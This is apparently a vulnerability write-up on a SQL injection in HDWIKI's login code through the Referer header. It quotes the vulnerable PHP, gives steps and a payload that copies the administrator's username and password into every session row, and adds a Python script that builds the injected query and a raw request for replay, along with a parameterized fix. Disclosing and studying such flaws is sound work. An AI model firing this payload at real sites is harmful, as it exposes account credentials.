HDWIKI: a low-value 0day (SQL injection through the Referer header)

Author: hack1990  Date: 11-10-12

model/user.class.php

```php
function add_referer(){
    if($_SERVER['HTTP_REFERER']){
        // The Referer header is concatenated straight into the UPDATE with no escaping
        // or binding; the sid cookie is concatenated the same way. The problem is here.
        $this->db->query("UPDATE ".DB_TABLEPRE."session SET referer='".$_SERVER['HTTP_REFERER']."' WHERE sid='".base::hgetcookie('sid')."'");
    }
}

function get_referer(){
    $session=$this->db->fetch_first("SELECT referer FROM ".DB_TABLEPRE."session WHERE sid='".base::hgetcookie('sid')."'");
    if($session['referer']==""){
        $session['referer']="index.php";
    }else{
        // A stored referer containing 'admin_' is rewritten to the admin entry page
        if(strpos($session['referer'],'admin_')!==false){
            $session['referer']="index.php?admin_main";
        }
    }
    return $session['referer'];
}
```

Tracing the caller back to control/user.php (www.hack1990.com):

```php
function dologin(){
    $_ENV['user']->passport_server('login','1');
    if(!isset($this->post['submit'])){ // this branch is taken when the POST carries no 'submit' field

        $this->view->assign('checkcode',isset($this->setting['checkcode'])?$this->setting['checkcode']:0);

        $_ENV['user']->add_referer(); // the injection fires here, on login
        $_ENV['user']->passport_server('login','2');
        $_ENV['user']->passport_client('login');

        if(!isset($this->setting['name_min_length'])){$this->setting['name_min_length'] = 3;}
        if(!isset($this->setting['name_max_length'])){$this->setting['name_max_length'] = 15;}
        $loginTip2 = str_replace(array('3','15'),array($this->setting['name_min_length'],$this->setting['name_max_length']),$this->view->lang['loginTip2']);
        $this->view->assign('name_min_length',$this->setting['name_min_length']);
        $this->view->assign('name_max_length',$this->setting['name_max_length']);
        $this->view->assign('loginTip2',$loginTip2);
        //$this->view->display('login');
        $_ENV['block']->view('login');
    }else{

// ...remaining code omitted
```
Details:

1. Capture a login request.
2. Register any user and log in with it.
3. Edit the request so that the POST body keeps only username and password; delete everything else, in particular the submit field, because dologin() only calls add_referer() when submit is absent.
   e.g. username=test&password=test
4. With Burp Suite or nc, change the Referer header, for example to:
   admin_',username=(SELECT concat(username,0x2f,password) FROM wiki_user where uid=1)#

After the request is sent, the administrator's username and password (joined by 0x2f, a "/") are written into the username column of the wiki_session table. Because the trailing # comments out the rest of the statement, the WHERE sid='...' clause is dropped and every row of wiki_session receives the value, not just the attacker's own session.

Any page that reads wiki_session.username back out would therefore display the account and password (administrators and ordinary users share the wiki_user table).
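The vulnerable concatenation, the crafted login request from steps 3 and 4, and the parameterized form a fix would use, modelled in Python as an added example (this is not code from the write-up or from HDWIKI). It assumes DB_TABLEPRE is "wiki_", a login path of /index.php?user-login and a bare "sid" cookie name; the SQLite schema and sample rows are constructed for the demonstration and only carry the columns the write-up names.

```python
import sqlite3
from typing import Dict, Tuple

# Assumption: DB_TABLEPRE is "wiki_", matching the wiki_user/wiki_session names in the write-up.
DB_TABLEPRE = "wiki_"

# The Referer value from step 4 of the write-up, verbatim.
PAYLOAD = ("admin_',username=(SELECT concat(username,0x2f,password) "
           "FROM wiki_user where uid=1)#")


def build_add_referer_query(referer: str, sid: str) -> str:
    """Model of the string concatenation in add_referer(): header and cookie
    are pasted into the statement with no escaping or binding."""
    return ("UPDATE " + DB_TABLEPRE + "session SET referer='" + referer
            + "' WHERE sid='" + sid + "'")


def build_login_request(host: str, username: str, password: str,
                        referer: str, sid: str,
                        path: str = "/index.php?user-login") -> bytes:
    """Raw login POST from steps 3 and 4: only username and password in the body
    (no 'submit' field, so dologin() takes the branch that calls add_referer()),
    and the payload in the Referer header. The login path and the bare 'sid'
    cookie name are assumptions; the real cookie may carry a site prefix."""
    body = f"username={username}&password={password}"
    head = "\r\n".join([
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Cookie: sid={sid}",
        f"Referer: {referer}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
    ])
    return (head + "\r\n\r\n" + body).encode()


def parameterized_update(referer: str) -> Dict[str, Tuple[str, str]]:
    """The fix: bind the header as a parameter instead of concatenating it.
    Uses an in-memory SQLite database with a constructed schema and sample rows
    (the real tables are MySQL; only the sid/username/referer and uid/username/
    password columns named in the write-up are modelled). Returns
    {sid: (username, referer)} after the update."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wiki_session (sid TEXT PRIMARY KEY, username TEXT, referer TEXT)")
    conn.execute("CREATE TABLE wiki_user (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO wiki_user VALUES (1, 'admin', 'constructed-hash')")  # constructed sample row
    conn.executemany("INSERT INTO wiki_session VALUES (?, ?, '')",
                     [("attacker-sid", "test"), ("other-sid", "other")])  # constructed sample rows
    # With a bound parameter the whole Referer is stored as data; the quote,
    # the extra SET column and the '#' never reach the SQL parser.
    conn.execute("UPDATE wiki_session SET referer=? WHERE sid=?", (referer, "attacker-sid"))
    rows = conn.execute("SELECT sid, username, referer FROM wiki_session").fetchall()
    conn.close()
    return {sid: (username, ref) for sid, username, ref in rows}


if __name__ == "__main__":
    # The statement the vulnerable code would send to MySQL. There the '#' starts
    # a comment, so the WHERE clause is dropped and the subquery result lands in
    # the username column of every session row.
    print(build_add_referer_query(PAYLOAD, "attacker-sid"))
    print(build_login_request("wiki.example", "test", "test", PAYLOAD, "attacker-sid").decode())
    print(parameterized_update(PAYLOAD))
```

Running the script prints the rewritten UPDATE, the raw request to replay with nc, and the session table after the parameterized update, where the payload sits inert in the referer column and the username column is untouched.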

 

Note: however, I have not found anywhere that echoes the username column, or any other hdwiki_session column, back to the page, which is what makes this low-value.